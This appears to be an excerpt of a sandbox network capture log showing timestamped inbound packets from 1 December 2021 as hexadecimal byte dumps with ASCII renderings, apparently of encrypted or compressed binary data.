2021-12-01 18:25:38 UTC	9	IN	Data Raw: d4 51 cc 40 20 c8 53 d4 0d eb 57 91 72 db a3 31 a3 82 cd c1 ef f4 42 7d 01 46 ed 60 30 6a d0 ef d3 4a 45 73 7a 19 d3 bd a5 3c b5 88 b2 79 18 9b 07 08 a1 8a 5a 08 07 ed 6c 48 7b 49 94 de 5e ac a7 95 31 4d 2b 73 be 6c d9 43 5a 92 a5 ac 52 85 23 b9 03 1e 0d 52 5e de eb ba d1 51 4f 9c 52 71 51 ca 92 1d 98 95 7e 71 c0 ba 12 5c be 99 73 6b 3a c9 d0 4f 46 c0 d3 33 cc a6 0a 94 31 bf 44 91 56 93 1b 94 61 b3 cf 04 5e d3 d0 0c a9 bf e5 90 3a 9f b5 2d 0f 54 9d 3c 94 d0 39 1e 92 2d 2f f1 73 fe 81 f9 c0 d1 57 01 b5 a0 85 03 3d 4b dc ff 89 d1 11 79 4a 02 88 43 d7 08 25 17 d5 e5 e5 dc 78 fa c5 d9 9d 1d 9d 0a 58 16 93 17 f0 75 38 dc 34 1c ae 5a 6d ad 7a 53 9f 09 52 c4 27 6a 3a b4 1d 7f 81 fd 38 86 ae 53 45 cf 0a b3 2d 02 d2 ab 4e fc f3 ad 17 da 02 8b e3 27 f5 21 47 fc 16 Data Ascii: Q@ SWr1B}F`0jJEsz<yZlH{I^1M+slCZR#R^QORqQ~q\sk:OF31DVa^:-T<9-/sW=KyJC%xXu84ZmzSR'j:8SE-N'!G
2021-12-01 18:25:38 UTC	13	IN	Data Raw: 92 71 c8 c7 3d f0 fd b6 fc 3e 02 4e db 73 10 66 db 61 be 97 23 73 f0 9f c2 88 2d 40 c0 2c 43 c1 aa ac 38 c5 16 0d 3f d0 31 49 86 56 e1 25 b9 1f b2 83 24 5e 50 34 7a 3f 69 46 48 d8 b6 0f 14 fd cd 50 59 3f c4 22 2f b3 2b 4f 47 79 da ec d5 51 fc 72 47 0c 1d ac cd 6c f8 e1 79 97 b0 81 ac 55 be 15 6b 9c 86 ed 89 4a 92 9e 58 42 ee 30 7f 05 f6 a3 aa 9e b5 e7 12 ec 10 73 46 dc 52 ef 95 46 ef db 59 7b 84 19 d3 72 03 2b 7d 0b c2 ab 47 18 4c e5 54 9a 02 01 fc b4 f3 8e eb 68 e2 57 54 5f 65 a1 71 f7 ab 66 72 ee 21 5a 80 1a 0e a9 c6 e0 f6 b4 f7 2c 81 c1 a7 17 9b 9d 28 f4 ee 71 33 bf f5 96 13 20 d5 70 00 77 38 60 27 da ae da 9e 89 6d 77 68 9a 13 74 28 ff 5d 58 1e d0 b5 a1 7e 5b 1e c9 b1 f6 1f e0 62 c9 8a 1a cd c7 0c 6c ff 40 f9 e1 b2 bd c3 de 0d 07 cc c9 2b b3 0a 11 64 Data Ascii: q=>Nsfa#s-@,C8?1IV%$^P4z?iFHPY?"/+OGyQrGlyUkJXB0sFRFY{r+}GLThWT_eqfr!Z,(q3 pw8`'mwht(]X~[bl@+d
2021-12-01 18:25:38 UTC	17	IN	Data Raw: 50 3a 30 fa d4 15 b4 67 4c 0d 0b e5 d4 82 88 48 04 49 05 9f c6 1f b7 49 45 6d 29 bd a3 93 0e dd 92 4c 77 8b 42 6c bf 3c 33 58 a6 e0 11 ae 43 f9 b2 2c 92 fb fa 80 96 c8 11 4d c0 5d 4c 6f 3d 2b 4a c3 7d 0b cd d9 33 57 1c e2 22 41 de 32 5f a4 37 e0 dd 96 8e 31 c7 9a 1c de 0e 28 11 82 af 31 f6 42 f6 9c 48 f7 9f 7a e1 a7 64 af fc 39 f4 6b 28 2b 06 5e d6 2c b0 c4 81 cc 03 02 96 36 05 b6 0e da 8a 48 15 a7 87 65 b3 a0 e1 50 8c 01 2e 50 3c 37 29 4e 10 13 e1 ba ac 89 c6 6e b6 b8 77 71 b1 a1 55 a6 af 1c 18 81 15 49 fe 36 0a df 4a 47 50 87 a6 de ef ba 50 33 8f 2d b6 ee 7b 97 2c 1d b3 db 0d a1 64 57 38 76 44 30 cb 5e 91 5a 4c f9 0c 10 80 a9 a7 8a 68 67 22 04 33 9b eb ff 33 c5 dd d6 7f a8 59 ed a7 cd f6 fc 4f 7c c0 98 76 f4 ab 1d 16 37 49 f7 8a 9d 96 5f 5c 4d 7d 33 81 Data Ascii: P:0gLHIIEm)LwBl<3XC,M]Lo=+J}3W"A2_71(1BHzd9k(+^,6HeP.P<7)NnwqUI6JGPP3-{,dW8vD0^ZLhg"33YO\|v7I_\M}3
2021-12-01 18:25:38 UTC	18	IN	Data Raw: d3 ac 8f 9a 42 99 e8 3c e2 c0 ef 7c 40 1c aa 30 39 77 c6 37 5b f0 e6 23 a8 d7 64 34 0f 88 0c d4 e3 e5 d4 2b 6e 69 46 71 bb fa 0c 9f fc cd 1d 24 91 5d 9f 2e 38 e0 36 c6 b2 9f 93 57 69 88 29 22 ab e8 c6 dd b1 55 87 db e5 02 25 c9 dd be fd c7 3e f4 5f fc ef bf 7c 46 b6 9a 82 29 24 45 91 aa 59 3f 3a 91 2e 75 f8 87 38 de d2 61 b9 9b 69 a0 66 be 50 84 11 6f a5 1c 07 f1 d7 71 5f 1a d9 e6 93 cd 89 a8 3c 0b 86 ef 0a 20 7d df af d8 6a ab a6 20 a6 8c cc a3 6c 48 a3 07 22 d6 1f 2f 15 5f 2d 3e 5a ae 62 63 ac 0d c7 53 21 e9 0d e8 0a 85 99 2a 48 15 0e 74 64 cf 76 d9 dd 41 74 23 02 fd 36 bc 31 d8 b3 55 a0 e6 f8 d6 a1 2e 8e 1c e3 ed d0 49 6b 18 09 3c f6 fd f4 94 1b e1 1e 4a 0c 84 13 6d bd 56 cf 0f 0b ec e2 9f f8 ff 6e ca 57 06 67 f1 7e 48 c9 6e a1 d2 fb 18 8b 7b 5a 20 0e Data Ascii: B<\|@09w7[#d4+niFq$].86Wi)"U%>_\|F)$EY?:.u8aifPoq_< }j lH"/_->ZbcS!*HtdvAt#61U.Ik<JmVnWg~Hn{Z
2021-12-01 18:25:38 UTC	19	IN	Data Raw: 40 85 0f 9f 7a f5 78 a9 46 88 0c d0 1d 5e ba c3 0b 1a 0f 0e 1b 96 ad d8 5c cb 7f c7 e8 06 93 46 19 11 a7 2e e6 a0 21 27 88 07 73 c5 11 30 e3 ae b6 9d 91 18 f0 dc 98 4b e3 f3 db 1a 0a a2 46 5d 05 1d d5 d5 de d5 4a fe 2b 46 df aa 10 db 76 2f 16 aa 28 5b af 8f d5 19 15 3d 78 b2 79 a3 a7 1c d5 5d f6 10 bc cd 76 ae 85 f0 4d 33 ff a4 ed d5 2c 6a 73 1c de ee 99 82 8c 44 fb 30 d1 00 62 19 da a2 16 f6 3a d0 04 85 f2 33 8f 21 36 df 2d 75 09 5a dd 80 32 3f 59 df b5 5b e4 86 36 af 40 28 ff fc af 06 01 73 86 fe d6 c7 3e 52 06 a3 ca a6 5b be 93 e4 73 30 d5 20 3a 12 99 c6 d4 d5 f3 44 9f cf 52 a8 96 95 c5 bc f3 97 bc e7 c6 0c cb c4 f3 8b 3d 17 10 8b 9f 10 f0 c2 5e ae bf da 7c e8 4a e2 34 d4 c2 55 e9 35 d7 39 b4 bd f7 a9 8f 61 66 12 86 e2 74 cd 29 8a 86 c3 07 41 1b 0b e7 Data Ascii: @zxF^\F.!'s0KF]J+Fv/([=xy]vM3,jsD0b:3!6-uZ2?Y[6@(s>R[s0 :DR=^\|J4U59aft)A
2021-12-01 18:25:38 UTC	20	IN	Data Raw: 33 8b 0b 15 ee 05 8b 86 58 99 a9 46 bb 55 92 60 f6 90 4a bf fc 31 da 8b 9b 51 22 19 c8 64 75 c5 f5 15 bd 82 b7 50 99 09 16 93 67 9a 0b 3d bc b7 6c 9c 60 3a 22 1a d7 ff 00 aa 43 30 a8 ab fc db 28 75 e2 22 f0 56 4d a5 15 13 5d 5d c9 c0 d3 12 9f a2 eb 7c a3 72 9c c5 16 96 6e e2 3a bb ce 4c d2 64 ea 25 d2 a1 50 fe 1b 0f 4a 30 15 f2 83 65 da b8 0e fd 7f 4d ad 34 2d a2 05 8c 9c 84 cd cc 72 fd 6d 32 5f 3a 2b ef 65 6c 55 a0 83 36 90 91 9b fa 17 ed 49 bd 7b 41 b2 29 c9 af 76 79 3f 88 6e a7 4d 3c 8d 02 3f b9 35 2d 73 8b b2 0e 2c 8b f9 44 98 33 42 9e 83 70 e8 c8 6f bd 91 e9 ef e6 52 1a 31 c1 0a 78 69 d2 f6 60 f2 00 aa 14 b2 63 3b be 0d e4 bf 97 97 83 28 6b 1a 7e 46 8d 30 79 93 93 4c 64 d3 30 80 76 86 57 e4 52 d2 f6 e5 6e 81 47 78 62 63 d1 6b 72 f9 f5 9b 8c 4a 1a 22 Data Ascii: 3XFU`J1Q"duPg=l`:"C0(u"VM]]\|rn:Ld%PJ0eM4-rm2_:+elU6I{A)vy?nM<?5-s,D3BpoR1xi`c;(k~F0yLd0vWRnGxbckrJ"
2021-12-01 18:25:38 UTC	22	IN	Data Raw: 41 ed 0e 36 d9 78 3b f6 83 cc bc c6 5d f6 ee 7c a8 6f 75 2a 82 86 52 47 b3 d8 16 5e d3 d8 a6 a0 03 d6 cb 64 42 fd 87 0a 56 e5 17 83 5d eb ac c9 4e 8b 69 84 3f e4 9b cf 20 59 b0 c9 5a 9b 66 cd c0 51 71 55 95 4f ba 9c af 64 4b 7d 01 06 06 ff b7 e5 ee ae 76 c9 1e c8 33 68 12 a4 c8 5e 28 73 46 ca 20 3a 66 24 3e f2 6e 00 53 ad ed 45 92 e8 ac 64 6a f9 73 02 44 b2 02 cb 82 27 46 c9 e8 28 00 52 80 59 71 42 1b 53 51 39 6d 9a cf f7 d0 c2 eb d2 d4 80 fe 3f db 8b b6 66 19 21 22 6e 6c 4c e1 4f fb 79 4a 2f fa 61 fc c3 1d 2b ec f2 af b2 3e 8f e1 24 4d 9d d3 9b d7 ed 83 c8 57 d0 41 f0 1d a7 37 f9 be d6 5c 6d 4a 7d 2d 17 29 0b 05 ae 6b 5f c1 4c 25 e0 43 7f 78 a8 5f 4b 24 e3 e9 27 3f 29 4f 77 7c 08 a3 38 8a e1 c6 20 db fe a6 1e f0 95 2b b9 27 1a 47 eb 55 5d 9e 0f 4b a7 1c Data Ascii: A6x;]\|ou*RG^dBV]Ni? YZfQqUOdK}v3h^(sF :f$>nSEdjsD'F(RYqBSQ9m?f!"nlLOyJ/a+>$MWA7\mJ}-)k_L%Cx_K$'?)Ow\|8 +'GU]K
2021-12-01 18:25:38 UTC	23	IN	Data Raw: 39 e7 a8 e1 96 2a 29 56 5f 44 f7 12 28 a4 32 2c 2d 3b 34 6a fe 15 86 d1 3e d8 38 93 58 8b 5e fb 25 9c d4 d5 21 2e d6 5f 97 a8 84 f1 94 3e f2 e5 c9 a4 1e a2 42 75 b5 7a 18 9f 91 cc 42 18 67 ae f6 db 88 8f 57 c5 67 f6 96 48 c9 6e c3 9b 3c da 8f 11 99 78 4e a9 d4 5a 2d 69 84 83 e2 1a fb 12 ce 6b c9 df 31 c8 41 9c cd 16 65 7e 02 31 ab 8d 45 a5 36 f8 ed b6 af 7a c6 14 e7 74 01 f7 29 40 af 1c ef 7b 7a e5 e7 0c 61 41 89 06 60 9e c0 20 1e 68 77 15 a7 61 27 b9 56 ff 6a 0c 03 9b 54 3c f6 a1 b9 f8 0b 52 73 b5 14 86 1c 27 3e 39 f1 4b e2 e7 5a 85 b3 98 11 ce e2 44 4a b7 3e 5c 3a 83 59 79 b8 cc 6b 0b 2b 9e 7c 83 42 34 8d 24 2d 0b cd b4 ed 03 51 88 0a e0 28 c0 8f 6e 4b 8a 29 d6 f2 b8 53 be 1d 8f 97 44 49 40 25 a4 f0 1f e9 76 20 4a b1 3d 95 8f f5 e2 06 c3 46 a5 5f cd bd Data Ascii: 9*)V_D(2,-;4j>8X^%!._>BuzBgWgHn<xNZ-ik1Ae~1E6zt)@{zaA` hwa'VjT<Rs'>9KZDJ>\:Yyk+\|B4$-Q(nK)SDI@%v J=F_
2021-12-01 18:25:38 UTC	24	IN	Data Raw: 4c 9c 22 1b f8 64 7d be e7 a1 de 6e 70 52 8b 89 b9 5c a6 df f3 38 72 1f ba e6 ad 39 d2 21 c1 80 fd 9f 74 1f a8 d4 c1 bb 36 65 a2 f2 3a 28 c2 8e 55 ba 48 dc 77 f0 fc 57 2c 2f 3d 80 1c f0 80 88 b5 1e 40 00 e0 30 d7 dd ed 89 71 cd 76 e7 22 83 bb 75 90 ce c2 48 a9 6d 23 ef 49 9a 3a 06 f0 7b 5e 85 9d 68 16 c8 19 d9 98 41 7d c6 f4 da 7a 5a c6 eb fb c1 08 ac dc ef ec 05 02 96 a0 4c 89 70 00 bc 5d a5 58 5b 0b 7b 0a fe 21 bb 14 18 fc 8d e1 59 d7 f3 62 ef 46 d3 fe 56 8f 58 e6 6a b9 5b 94 43 6b 1a 1d a1 cd a3 24 26 a5 55 bf 54 7a e1 5b c1 33 80 ef 38 64 bc dd 5e e4 b5 a5 b6 9d 98 60 d6 9e cc fd d1 f4 ee 40 7a 9b ab 8a 51 15 98 4a e3 c6 76 6d 6d b9 b4 5c 4b 61 d1 23 33 29 75 31 75 f2 3b 81 60 aa ee 76 48 0c ee ad b5 59 85 3b 2b d4 f1 f3 6f 25 9c ea 48 fb 99 b0 b2 f5 Data Ascii: L"d}npR\8r9!t6e:(UHwW,/=@0qv"uHm#I:{^hA}zZLp]X[{!YbFVXj[Ck$&UTz[38d^`@zQJvmm\Ka#3)u1u;`vHY;+o%H
2021-12-01 18:25:38 UTC	26	IN	Data Raw: b8 db d3 50 1e 8b 13 e4 64 3e 66 47 26 69 f0 cb 2d 36 dd 25 53 d9 7a 02 61 4c c4 bc a5 27 4a ed b6 4c 12 3b a3 e8 7d 1b 0b c1 04 b1 e5 30 5c b6 60 7e bd 9a be d9 e1 21 67 c0 cc ac 68 77 15 1a 1c 39 f0 d6 c5 6e 81 46 c4 02 b9 cc 14 51 bc f7 a9 8c 38 d2 9a 46 de 18 3d 9a b2 37 6c ec 40 7d 84 f8 39 1f f3 36 d2 7a bf 34 52 0d 91 66 da 36 fa a0 c3 1b fe 8a 3a 09 93 a5 5c c9 e2 86 2d 8d 77 cd bf 18 3b 81 7e 4a 2c f3 29 0d db 9a 48 f5 77 11 84 46 4f 81 5b 7d 61 66 35 cc 0d d3 83 7e 89 48 f3 50 b4 7d a1 34 63 bb c6 3b 7a 79 74 0c 88 04 1b 6e dc 04 95 9e 9a 1c eb 3a cb e6 75 20 4d 4e 87 3f b6 d8 26 f1 5c d7 b8 f2 92 3b f8 f2 f2 4a 5a 0c b2 a4 09 64 2a 38 48 73 53 1d f0 c5 5a 05 6e b3 ec 7e 47 9c d7 86 08 51 3b 12 4d 8e ef 9c d3 3d e6 a8 d1 4c 38 04 f0 a5 9e 7d 42 Data Ascii: Pd>fG&i-6%SzaL'JL;}0\`~!ghw9nFQ8F=7l@}96z4Rf6:\-w;~J,)HwFO[}af5~HP}4c;zytn:u MN?&\;JZd*8HsSZn~GQ;M=L8}B
2021-12-01 18:25:38 UTC	27	IN	Data Raw: 2e e2 00 99 0d 08 3e d9 82 95 cf 93 2c 63 91 83 dd 77 42 1d ee 0f b7 af 1f 76 d1 e8 53 66 02 cb e2 51 8e 6e 81 27 7c 6f b3 86 60 b8 3f 92 62 d5 91 05 e6 0a 03 d7 44 eb 8d 1f dc f3 1a 28 7a 7b 40 52 9a fe c1 36 10 d4 2b e9 5b f7 67 e6 4e 29 57 4c d7 b4 00 b9 8a e1 97 47 8a cf 03 df f0 4c 16 72 37 4e dd 64 69 30 c2 66 be c4 4c b1 a4 b9 fc 3e 02 9c 64 35 70 c6 05 bf 9b 4d e5 f6 92 0e 41 eb 8d 48 8f 6a a8 2d 0f 21 75 b1 87 8f 7d 51 ff 21 dd df 5f 63 be 5e 54 07 62 67 6d fa 5f c0 3f cd 00 49 b0 4c 19 fd b9 e2 52 97 d0 51 27 39 a4 2a c7 f0 89 93 13 9e 70 29 b7 e1 a6 a8 d3 6a f0 15 2a d8 f2 c3 84 19 b6 0d 5b cd 4a 2b 34 aa 08 1d 15 be e0 82 08 40 d8 cb f1 57 fd ff 6d 83 24 2a 15 62 04 2f 1c 13 98 f9 28 bb 31 9a 7a 11 69 ac 61 04 68 a3 6d 47 91 5f dd 9d e3 35 e6 Data Ascii: .>,cwBvSfQn'\|o`?bD(z{@R6+[gN)WLGLr7Ndi0fL>d5pMAHj-!u}Q!_c^Tbgm_?ILRQ'9p)j[J+4@Wm$*b/(1ziahmG_5
2021-12-01 18:25:38 UTC	28	IN	Data Raw: 6f d1 0d 72 ba 28 66 ef ec 32 cf f9 55 52 0b 41 21 57 be 36 57 9d a2 79 47 e5 09 0d 0e 61 f7 8c c7 4b cf 58 21 4a 25 3f a9 7e 97 b6 0c e3 4b fb 26 4d 61 41 ed 17 39 52 d4 78 96 ca 92 87 88 4f 3c 66 3e 17 e3 58 c8 c9 5a 3d e3 49 bd ca 1b c8 63 5a b7 5b b3 51 77 6b 49 6c a2 97 9d 62 b5 0d c2 ab 47 62 a9 c0 9f 1d 0c 49 54 b3 fb 5c 11 41 19 e7 3f d5 99 8c 70 ae ad 3f 74 93 48 5e 90 3c 26 7a 17 d7 4e b9 31 54 10 83 b7 4e c1 86 89 f4 76 86 04 59 4a 13 01 49 5b ae 6d e1 cf ea f1 ae 6c 54 60 ab 4a 34 2e 68 88 9d ab 81 5e 97 d6 d2 a7 11 ca e3 3f 29 74 d3 c5 1b 56 63 3b 5e 0a 00 58 e4 b4 1a 89 bf bd 11 24 76 ee 51 ef 51 b6 be 35 25 19 a2 f4 82 cf ad c0 e2 c1 ed 2b 5c d9 b7 0d 8c 15 80 8d 28 dd 9c 9d 5a 37 a3 2f 9b 6a fd 3a 9f 8a e8 17 bd fd 15 d9 d0 9b 03 9d 68 63 Data Ascii: or(f2URA!W6WyGaKX!J%?~K&MaA9RxO<f>XZ=IcZ[QwkIlbGbIT\A?p?tH^<&zN1TNvYJI[mlT`J4.h^?)tVc;^X$vQQ5%+\(Z7/j:hc
2021-12-01 18:25:38 UTC	29	IN	Data Raw: ec 42 d2 d2 c3 e1 c2 be 0e 58 35 2b d3 bc e7 ee 59 30 17 27 aa 6d 61 fc f5 a7 38 49 34 2d 6c dc ba 2d 33 44 2b a9 18 e5 ce 46 86 57 53 0e 1f f3 69 fd f8 b5 95 fe 4c 1a 56 f3 59 74 fd a9 e2 93 e3 bd 1f b6 3b 13 77 af 3d 79 72 e3 4c 42 91 5c dd 7a fe 8e dc 62 d5 d2 51 e7 b0 6b 01 0a 58 a4 5d e6 a5 bd c9 24 b3 ec 7d 0d 68 f8 05 a2 d9 ce b3 cd de 56 26 ac 0d ca a5 72 ef ab 97 90 83 ae 7f fc a8 67 96 60 ad 7b 02 d5 2a a5 48 03 80 bc 8c 71 97 a4 27 e4 42 42 d2 0d d7 52 15 bf ca 30 51 23 88 19 57 95 13 93 5f 02 e5 ee cc 23 22 65 5d 54 ea 51 e2 89 c4 ee 13 05 5d 89 76 1c 80 3c ec 0a d3 58 26 4c e9 5d e3 a4 eb 26 45 0b 41 9c b3 ed 0d 04 d1 a7 a0 14 b2 46 ce 8a e1 e4 7b c6 fb d0 fc a6 3f db 6c 15 74 18 3b d7 9b 4b 70 c7 e4 fe e3 90 cd 62 ad fb 31 29 0d 37 22 b1 30 Data Ascii: BX5+Y0'ma8I4-l-3D+FWSiLVYt;w=yrLB\zbQkX]$}hV&rg`{*Hq'BBR0Q#W_#"e]TQ]v<X&L]&EAF{?lt;Kpb1)7"0
2021-12-01 18:25:38 UTC	31	IN	Data Raw: 9b fb 96 61 57 e2 92 01 10 ff 54 04 9d cd d8 de be 2a 6c bd 56 63 dd 8c be 18 70 d8 e7 7a 9a 46 77 bc c4 bf 96 c5 84 17 28 59 f3 38 30 66 13 d7 c2 3f 9f 55 4a 6b 80 b7 c3 a0 b0 b9 86 07 59 e8 b1 ed bd 93 da 23 f5 47 61 16 6e 2e e8 6c aa 8a 6a 79 a9 2b 31 e5 f7 71 55 c0 5b e9 29 78 6d 0a db 25 ba 03 86 ed 2d 35 04 1b 00 58 b0 fe 12 8a d7 aa 32 9e 9e 0c 54 ec 18 95 7c cf 26 ab cf be c2 2c 7e 85 e5 3a 28 2f bb b9 08 5b bf 17 90 95 08 ee 24 16 5b ce ec 84 d8 35 9b 87 e0 fc 29 a0 a7 b7 44 1d 35 e4 09 56 a8 23 07 a3 37 37 68 b4 a4 de 86 c8 d9 36 00 79 0a 76 80 68 59 52 e1 96 de f4 73 f8 34 db b7 80 0d 05 89 42 5d 5a d3 0b 84 0d 45 80 23 16 14 4a d6 0f d6 6a 03 01 14 59 5a e5 7c e8 85 fe e4 04 f7 81 e8 bd b1 72 f3 4c 47 d2 0a b6 ec 3f 5e 94 18 28 66 43 12 39 da Data Ascii: aWT*lVcpzFw(Y80f?UJkY#Gan.ljy+1qU[)xm%-5X2T\|&,~:(/[$[5)D5V#77h6yvhYRs4B]ZE#JjYZ\|rLG?^(fC9
2021-12-01 18:25:38 UTC	32	IN	Data Raw: a5 a1 4d 7e 2e 3e b4 2c c2 b9 33 f0 72 78 07 da e9 b7 2b d9 c5 93 51 64 7c be 76 ba ac fe 5f ea 94 0a 4c b4 71 fd 19 cf 91 81 30 f6 9b 6e 63 6d 29 72 4a f9 b0 38 fe 06 4e 07 c1 88 c4 cd a8 27 d5 d2 e1 ee f3 8e 27 52 59 3b 19 85 d1 b0 e5 97 6d b6 01 16 2e 38 80 cf d2 97 8b 13 d0 2b 7d e1 47 f7 20 3d bd c6 0c e1 ca 68 35 a8 c6 e0 96 d1 99 10 a6 9a 57 e6 4d f4 80 82 22 35 40 50 69 96 45 71 85 e4 c8 cf 1e 34 ae ae 09 3e 56 e6 6a fe 15 eb 5e 45 88 6e 95 ec 2a bc a4 5e 9a f4 55 21 e9 d0 e0 54 cd 0c 72 f2 3a a1 f3 d8 84 96 a2 28 71 bd 19 c2 6f e6 d8 36 fd 42 2a b8 5f 49 00 99 2d fb 31 21 c0 77 19 32 9e 74 fe c7 93 92 ed 59 47 50 15 29 b2 9c 95 ce ea 80 eb 86 4f e1 f0 54 5b c9 22 26 ab 64 7b 8f 75 e5 95 95 39 e6 ea bd e0 72 dc bc 56 cc 78 56 f3 29 c9 1c 3e fb 5d Data Ascii: M~.>,3rx+Qd\|v_Lq0ncm)rJ8N''RY;m.8+}G =h5WM"5@PiEq4>Vj^En^U!Tr:(qo6B_I-1!w2tYGP)OT["&d{u9rVxV)>]
2021-12-01 18:25:38 UTC	33	IN	Data Raw: 5f 72 c2 0b db d8 a4 8c c0 cc f5 06 a1 02 b7 6d 05 0a f4 8b b0 a5 4c 95 02 ca 08 ed 4a 98 84 7a c7 1e 01 2f ab 3b 0a 51 f0 ee 7d 83 4d 4d c0 e5 7b 32 2f 49 6d 3d 18 cc 1d 3b 7c 7e ec 44 59 10 36 28 63 57 6e e7 de fc 7d fd 14 76 ce 32 af 9d 6f 4f 12 78 6b 82 8a 99 3f 8c 6f 8f 07 79 df 2d af a9 b2 08 75 4d 4d 9d 03 b5 c1 8d 79 c9 a1 48 b4 22 82 17 d1 b9 69 d7 e0 dc 38 c1 2e 3f c2 57 63 21 93 6c 28 db 0b 67 ef f6 42 12 a7 60 ab 41 b3 fc 61 5f 92 9c e1 fd 68 65 24 5f d0 31 f3 15 87 f7 c7 25 8c bc 50 e1 23 95 3c 56 06 c9 0c c5 08 4f b9 f6 d0 a8 43 0a c4 90 fe b2 fd 70 e8 8f ea 7b dd 7b 4f 19 8c 29 32 89 22 7d 70 90 45 9d 84 7c 2c 6a 31 00 54 9b 61 f4 c2 dc d3 40 66 fc dd 53 eb d9 42 36 18 c4 8a ef a5 d1 67 7f 4c 4d 81 c1 8f ec ea 4d 96 a0 f2 07 ed 95 2c 2c d9 Data Ascii: _rmLJz/;Q}MM{2/Im=;\|~DY6(cWn}v2oOxk?oy-uMMyH"i8.?Wc!l(gB`Aa_he$_1%P#<VOCp{{O)2"}pE\|,j1Ta@fSB6gLMM,,
2021-12-01 18:25:38 UTC	34	IN	Data Raw: a7 9a 5f 0a be f8 36 5a aa 6a 05 05 0b b3 c0 46 92 84 f2 4c 47 3f 2b b2 19 e3 24 6f 98 52 ab 49 e4 8b eb 05 7c a6 98 7e 8a 88 2e 36 eb 28 8d 82 76 a6 28 ef b4 a7 93 21 f2 86 88 c3 9e d4 4b aa a6 07 40 97 b6 0f cd 21 e3 b4 3b 09 0b 0d c3 4d b8 95 34 8f e9 01 b6 33 91 80 58 44 7f 94 e4 98 d1 5b bd b3 80 e4 15 b5 7e 18 aa 1c 2b e1 94 b9 d9 4b 55 a9 07 a1 de 1d 09 89 36 0e c0 16 f9 54 1c 9e dd eb 67 a9 13 b1 88 77 c4 b9 8b 9d 7d 9f ae 0a e0 d9 93 44 40 1f 43 b0 2a a2 5a 33 3f 9a b9 d3 39 08 05 f7 b0 25 9b fd 24 ec 5c 76 ad 9e 73 8d 64 eb 03 7e a7 50 f5 90 3d 42 60 1d d0 1a 64 3b 84 b4 97 78 35 55 da 7d 09 4d e1 b6 cd c0 d2 40 37 d5 79 79 f9 24 88 a8 38 09 40 f9 e0 bb 38 e0 36 f0 b1 98 ce c0 e8 d6 5b 4e 9c b3 9b 82 20 5c a0 6d 51 a3 3a d4 5c d1 54 6f ba 6d 73 Data Ascii: _6ZjFLG?+$oRI\|~.6(v(!K@!;M43XD[~+KU6Tgw}D@C*Z3?9%$\vsd~P=B`d;x5U}M@7yy$8@86[N \mQ:\Toms
2021-12-01 18:25:38 UTC	35	IN	Data Raw: 75 52 a3 75 d7 b6 6e 81 de 45 7e cd 69 43 b4 04 14 ab cb 58 41 bf f1 6e 6e b3 f0 cd 5a f0 e4 59 56 15 3c 29 22 a3 fc 45 95 e2 bd e9 aa e4 bd 03 08 10 4c 4e 18 8b e3 3e 72 a2 47 fe 48 c8 bd 82 62 25 f5 d4 aa f8 bb 6a 6c bc 7a ee 87 dc 42 da 95 46 e0 6e 2c b8 e9 9c c1 76 a1 63 b3 5a 99 fc 6a 0e 1a 4a de 87 51 8d a8 3c 03 0b e7 6e e2 b3 37 c0 8e e1 47 7c f6 1f 6d 96 2b 9d c5 6d f1 cf c9 67 08 97 9d 29 d9 12 5d 63 63 f5 03 7c 8f 06 1a 34 92 61 9f 70 a2 f6 4a 07 5b 61 27 da ae cc b6 8b 42 7d fb 6f ea 2c 5b d6 1c dc 00 2b 1a a2 21 54 06 23 e9 d0 f6 85 eb 84 72 4b 8e 88 4d 6c 49 a1 a0 28 71 55 4a 4c d1 91 25 7c ea e2 58 40 97 63 ca 57 2c 0b f2 de 3f 0b 80 38 1c bc ae 8e 7b 9d 6f 25 56 da 2e 3e 61 9a 01 1b 90 50 64 ca 6b 70 08 4c d1 36 34 44 fd 0e 7a bb 31 ba c8 Data Ascii: uRunE~iCXAnnZYV<)"ELN>rGHb%jlzBFn,vcZjJQ<n7G\|m+mg)]cc\|4apJ[a'B}o,[+!T#rKMlI(qUJL%\|X@cW,?8{o%V.>aPdkpL64Dz1
2021-12-01 18:25:38 UTC	36	IN	Data Raw: 09 08 3b 2b 27 19 14 7a 3d ba b5 88 f8 cf 45 f0 f3 ea 40 ba 93 61 3c 0a 7e 92 a4 54 06 dc 2d 25 0a 0a 8e 56 b4 60 a1 3d 92 25 ea e3 76 1a d1 3b 1e 76 99 76 79 64 97 d4 ab 6d 6b 79 81 21 35 39 a4 07 0a 24 98 2a 21 c9 6d e4 16 cf 49 85 dc 57 78 ed 5b cd 02 d1 28 ac 30 23 c7 48 a8 26 14 fd 03 39 dd dc 67 a8 5d 30 b4 3a 71 17 ba d4 9e 3b 9a 81 20 84 01 b1 b6 f7 a6 6c 9c b5 55 5d 6a 61 7d 36 31 84 b2 79 09 db b4 76 53 33 c7 dc c7 9e 87 95 82 d3 06 2f ad 9b c8 63 03 cc 83 c7 99 51 7d 29 77 3f 44 99 43 9e 0d 0b 62 38 37 3b 28 52 9b 45 d7 60 e4 81 cc 36 17 64 43 de 7b dc 7d 21 a6 c9 25 1d f0 97 c3 f7 df 46 22 61 c4 80 7d 5a 9a 80 6c 80 e9 28 22 43 00 69 cd 29 cd 60 b5 0c 65 6f 30 db 84 1c e0 e5 05 08 c1 9a d1 16 fa 9d 58 ee 70 cc de 21 aa b3 51 7d 0c 08 c3 2a 0d Data Ascii: ;+'z=E@a<~T-%V`=%v;vvydmky!59$!mIWx[(0#H&9g]0:q; lU]ja}61yvS3/cQ})w?DCb87;(RE`6dC{}!%F"a}Zl("Ci)`eo0Xp!Q}
2021-12-01 18:25:38 UTC	38	IN	Data Raw: 1a c9 10 84 9a 9d e6 2e 5d a6 df c9 40 ac e8 aa 69 fe 55 42 97 03 31 b7 ec 28 d9 df af 8d 62 b9 ac a4 60 48 9a 28 9d 46 10 1b de a1 ef 99 57 9d 29 d6 15 a6 6a 11 d5 03 7c a6 7e e2 f3 e0 e2 61 e2 2b ba 4a 07 90 60 27 da ae dc b1 89 67 7d eb 7c 91 b7 44 38 18 a8 66 a8 f5 a1 2e e3 2a ac 6c d0 e0 1f 16 d3 22 1a ea 71 f3 93 23 da ae 7f 27 13 87 e2 e2 d0 cc 9e 82 e3 d5 b2 57 48 06 da c5 5f 0f 21 6e d8 38 d5 06 38 a9 ce 7b c2 7f 2d 7b 80 93 ee 61 8a 26 66 aa fc 98 e2 1d 9f 9b c9 be 42 8c 26 4c 8f 84 b1 31 c1 89 6b 6f 43 08 5f b6 24 8a 30 dd 6b 0e 36 81 b7 c3 96 73 b9 39 ba 1b a2 42 65 41 ff fd ed 39 87 f7 10 68 9c 1d d6 1a 6b b6 d2 c5 1c 8d 82 a2 92 34 81 e0 cf 04 a3 a8 